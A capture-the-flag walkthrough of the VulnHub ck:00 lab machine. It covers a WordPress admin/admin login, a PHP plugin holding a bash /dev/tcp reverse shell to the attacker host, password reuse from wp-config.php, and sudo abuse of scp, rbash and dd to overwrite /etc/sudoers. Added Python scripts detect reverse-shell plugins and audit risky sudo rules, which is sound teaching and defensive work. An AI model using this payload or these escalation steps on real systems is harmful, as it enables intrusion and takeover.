VulnHub ck:00

This is a VulnHub target machine for practising penetration testing and vulnerability exploitation. It is designed as an easy-difficulty challenge, intended to let penetration testers exercise their skills in information gathering, weak-password analysis and privilege escalation. The approach to compromising this machine is as follows.

https://www.vulnhub.com/entry/ck-00,444

Information gathering

Finding the target

$ sudo netdiscover -i eth1
 Currently scanning: 192.168.0.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.123   08:00:27:6a:4e:4d      1      60  PCS Systemtechnik GmbH

After discovering the host, scan it with nmap

t0thkr1s@darlene:~/Downloads$ sudo nmap -A -Pn -sC -p- 192.168.0.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 09:45 CET
Nmap scan report for 192.168.0.123
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:6f:64:b5:4c:22:ce:b2:c9:8a:ab:57:0e:69:4a:0f (RSA)
|   256 a8:6f:9c:0e:d2:ee:f8:73:0a:0f:5f:57:1c:2f:59:3a (ECDSA)
|_  256 10:8c:55:d4:79:7f:63:0f:ff:ea:c8:fb:73:1e:21:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.2.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: CK~00 – Just another WordPress site

SSH and a web service are found; the web service runs WordPress.

Obtaining WordPress administrator access

Using wpscan to analyse the WordPress installation for weaknesses, the admin panel credentials are found to be admin / admin.

$ wpscan --url http://192.168.0.123 -U admin -P /usr/share/wordlists/rockyou.txt 
...omit...
[!] Valid Combinations Found:
 | Username: admin, Password: admin

Getting a reverse shell

Create a plugin containing a reverse shell, configured to connect back to the attacking machine at 192.168.0.111:1234, as shown below; then upload rshellplugin.zip on the Plugins page of the WordPress admin panel.

$ touch rshell.php
$ vim rshell.php
 <?php
 
 /**
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI:
 * Description: Reverse Shell Plugin
 * Version: 1.0
 * Author: raymond
 * Author URI: https://systw.net
 */
 exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.111/1234 0>&1'");
 ?>
$ zip rshellplugin.zip rshell.php

Listening on port 1234 successfully receives the reverse shell.

$ nc -nlvp 1234
listening on [any] 1234 ...
...omit...
www-data@ck00:/var/www/html/wp-admin$
www-data@ck00:/var/www/html/wp-admin$ cd /home/ck
www-data@ck00:/home/ck$ ls
...omit...
ck00-local-flag
...omit...

PS:
Besides this method, the Metasploit module exploit/unix/webapp/wp_admin_shell_upload can also be used to get a reverse shell.
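From the defender's side, the plugin upload above is the event worth catching: a PHP file under wp-content/plugins that calls a command-execution function and carries a connect-back pattern. The following scanner is an added example and not part of the original write-up; it assumes a plugins tree laid out like WordPress's wp-content/plugins, uses the plugin from this write-up as a constructed positive sample, and a constructed harmless plugin as a negative one.

```python
import re
import tempfile
from pathlib import Path

# PHP primitives that run operating-system commands.
EXEC_FUNCS = re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Indicators of the connect-back shell used in this write-up.
SHELL_INDICATORS = re.compile(r"/dev/tcp/|bash\s+-i\b", re.I)

# Constructed sample: the plugin from the write-up above.
RSHELL_SAMPLE = """<?php
/**
 * Plugin Name: Reverse Shell Plugin
 * Description: Reverse Shell Plugin
 * Version: 1.0
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.111/1234 0>&1'");
?>
"""

# Constructed sample: a harmless plugin that only registers a WordPress hook.
BENIGN_SAMPLE = """<?php
/**
 * Plugin Name: Hello Footer
 */
add_action('wp_footer', function () { echo '<p>Hello</p>'; });
?>
"""


def scan_plugin_source(src):
    """Return (line_no, reason, line) triples for every suspicious line in one PHP file."""
    findings = []
    for no, line in enumerate(src.splitlines(), start=1):
        if EXEC_FUNCS.search(line):
            findings.append((no, "command-execution call", line.strip()))
        if SHELL_INDICATORS.search(line):
            findings.append((no, "reverse-shell indicator", line.strip()))
    return findings


def scan_plugins_dir(plugins_dir):
    """Walk a wp-content/plugins tree; return {relative path: findings} for flagged files only."""
    base = Path(plugins_dir)
    report = {}
    for php in sorted(base.rglob("*.php")):
        hits = scan_plugin_source(php.read_text(errors="replace"))
        if hits:
            report[php.relative_to(base).as_posix()] = hits
    return report


def demo_report():
    """Build a throwaway plugins directory from the two samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "rshellplugin").mkdir()
        (root / "rshellplugin" / "rshell.php").write_text(RSHELL_SAMPLE)
        (root / "hello-footer").mkdir()
        (root / "hello-footer" / "hello.php").write_text(BENIGN_SAMPLE)
        return scan_plugins_dir(root)


if __name__ == "__main__":
    for path, hits in demo_report().items():
        for no, reason, line in hits:
            print(f"{path}:{no}: {reason}: {line}")
```

Run it against a real wp-content/plugins directory with scan_plugins_dir(path); a hit on a freshly uploaded plugin is a strong signal, since legitimate plugins rarely need exec() at all and never a /dev/tcp redirection. Pair this with disabling plugin upload for sites that do not need it and with a non-default admin password, which is what made the upload possible here.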

Privilege Escalation to bla

Gathering information in order to compromise other accounts, a user bla is found along with what appears to be bla's password; trying to log in with it succeeds.

www-data@ck00:/var/www/html$ cat wp-config.php
...omit...
/** MySQL database password */
define( 'DB_PASSWORD', 'bla_is_my_password' );
...omit...
www-data@ck00:/var/www/html$ cat /etc/passwd
...omit...
bla:x:1002:1002:bla,0000,0000,0000:/home/bla:/bin/bash
...omit...
www-data@ck00:/var/www/html$ su - bla
su - bla
Password: bla_is_my_password
bla@ck00:~$ 

Privilege Escalation to bla1

Attempting to escalate from bla, sudo -l shows that scp can be run with elevated privileges, which can be used to tamper with SSH login authentication.

bla@ck00:~$ sudo -l
sudo -l
[sudo] password for bla: bla_is_my_password

Matching Defaults entries for bla on ck00:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bla may run the following commands on ck00:
    (bla1) /usr/bin/scp

On the attacking machine, generate a public/private key pair, bla1.pub and bla1.

attacker@192.168.0.111:~/Downloads$ ssh-keygen -f bla1
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in bla1
Your public key has been saved in bla1.pub
The key fingerprint is:
SHA256:L/rdNL1obo0xHAyc76uPzZjPlkc4+VvlS3c2s5kYXgE attacker@192.168.0.111
The key's randomart image is:
+---[RSA 3072]----+
|         . .     |
|          +      |
|           + E   |
|            + .  |
|        S  o + ..|
|         .  O...o|
|        . . o%.=*|
|       . o XOoO+X|
|      ... *OX+o* |
+----[SHA256]-----+

On the target machine, as bla, copy bla1.pub from the attacking machine to /home/bla1/.ssh/authorized_keys.

bla@ck00:~$ sudo -u bla1 /usr/bin/scp attacker@192.168.0.111:/home/t0thkr1s/Downloads/bla1.pub /home/bla1/.ssh/authorized_keys
The authenticity of host '192.168.0.111 (192.168.0.111)' can't be established.
ECDSA key fingerprint is SHA256:g626ptplxc2u6oHhURvhEsEnXQTs8mbygf0VFAIqqeU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.111' (ECDSA) to the list of known hosts.
attacker@192.168.0.111's password: 
bla1.pub

From the attacking machine, log in to the target over SSH as bla1 using the bla1 private key.

attacker@192.168.0.111:~/Downloads$ ssh -i bla1 bla1@192.168.0.123
bla1@ck00:~$

Privilege Escalation to ck-00

As bla1, sudo -l shows that rbash (restricted bash, a bash with limited, restricted functionality) can be run as ck-00; running the rbash program as ck-00 therefore yields a shell as ck-00.

bla1@ck00:~$ sudo -l
Matching Defaults entries for bla1 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla1 may run the following commands on ck00:
    (ck-00) NOPASSWD: /bin/rbash
bla1@ck00:~$ sudo -u ck-00 /bin/rbash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
ck-00@ck00:~$  

Checking ck-00's privileges shows that dd can be run as root.

ck-00@ck00:~$ sudo -l
Matching Defaults entries for ck-00 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck-00 may run the following commands on ck00:
    (root) NOPASSWD: /bin/dd
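Each of the three escalation steps on this box (scp as bla1, rbash as ck-00, dd as root) rests on a sudo rule that hands out a file-write or a shell under another account. An auditor can find such rules before anyone else does by parsing the same `sudo -l` text shown above. The script below is an added example, not code from the write-up; it treats the three outputs above, concatenated, as a constructed sample, and the RISKY table is a short list built from this box plus ordinary shells, not an exhaustive catalogue.

```python
import re
from dataclasses import dataclass


@dataclass
class SudoRule:
    user: str       # account the rule applies to
    runas: str      # account the command runs as
    nopasswd: bool  # True when NOPASSWD: is present
    command: str    # the permitted command (or ALL)


# Commands that, when permitted under sudo, let the caller write arbitrary files
# or obtain a shell as the run-as user. Constructed for this example from the
# three rules on this box plus ordinary shells; not an exhaustive list.
RISKY = {
    "dd": "writes arbitrary files as the run-as user (the write-up overwrites /etc/sudoers with it)",
    "scp": "copies arbitrary files into the run-as user's home (the write-up drops an authorized_keys)",
    "rbash": "is still a shell; running it as ck-00 gives a ck-00 prompt",
    "bash": "is a full shell",
    "sh": "is a full shell",
}

USER_LINE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
RULE_LINE = re.compile(r"^\s*\(([^)]+)\)\s+(?:(NOPASSWD|PASSWD):\s*)?(\S+)(.*)$")


def parse_sudo_l(output):
    """Parse the text printed by `sudo -l` into SudoRule objects (Defaults lines are skipped)."""
    rules, user = [], None
    for line in output.splitlines():
        m = USER_LINE.match(line)
        if m:
            user = m.group(1)
            continue
        m = RULE_LINE.match(line)
        if m and user:
            runas, tag, cmd, _args = m.groups()
            rules.append(SudoRule(user, runas, tag == "NOPASSWD", cmd))
    return rules


def audit(rules):
    """Return (user, runas, command, reason) for every rule granting file-write or shell ability."""
    findings = []
    for r in rules:
        name = r.command.rsplit("/", 1)[-1]
        if r.command == "ALL":
            findings.append((r.user, r.runas, "ALL", "unrestricted command set"))
        elif name in RISKY:
            findings.append((r.user, r.runas, name, RISKY[name]))
    return findings


# Constructed sample: the three `sudo -l` outputs from this write-up, concatenated.
SAMPLE = r"""Matching Defaults entries for bla on ck00:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bla may run the following commands on ck00:
    (bla1) /usr/bin/scp
Matching Defaults entries for bla1 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla1 may run the following commands on ck00:
    (ck-00) NOPASSWD: /bin/rbash
Matching Defaults entries for ck-00 on ck00:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck-00 may run the following commands on ck00:
    (root) NOPASSWD: /bin/dd
"""

if __name__ == "__main__":
    for user, runas, cmd, why in audit(parse_sudo_l(SAMPLE)):
        print(f"{user} -> {runas}: {cmd} {why}")
```

On a real host, feed it the output of `sudo -l -U <account>` for each account, or run it under each account in turn. Every finding is a rule to remove or to replace with a narrowly scoped wrapper script that takes no user-controlled paths; note also that the ALL rule the write-up later injects is flagged by the same check, which is the state a post-compromise audit would see.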

Write a new privilege for ck-00 into /etc/sudoers

ck-00@ck00:~$ echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
0+1 records in
0+1 records out
30 bytes copied, 0.0000112222 s, 22.1 kB/s
ck-00@ck00:~$ sudo su
root@ck00:/home/bla1# 
root@ck00:/home/bla1# ls /root 
...omit...
ck00-root-flag.txt
...omit...

Root access is obtained and ck00-root-flag.txt can be read.

References
https://medium.com/infosec-adventures/ck-00-walkthrough-800be72362b3
https://www.armourinfosec.com/ck00-vulnhub-walkthrough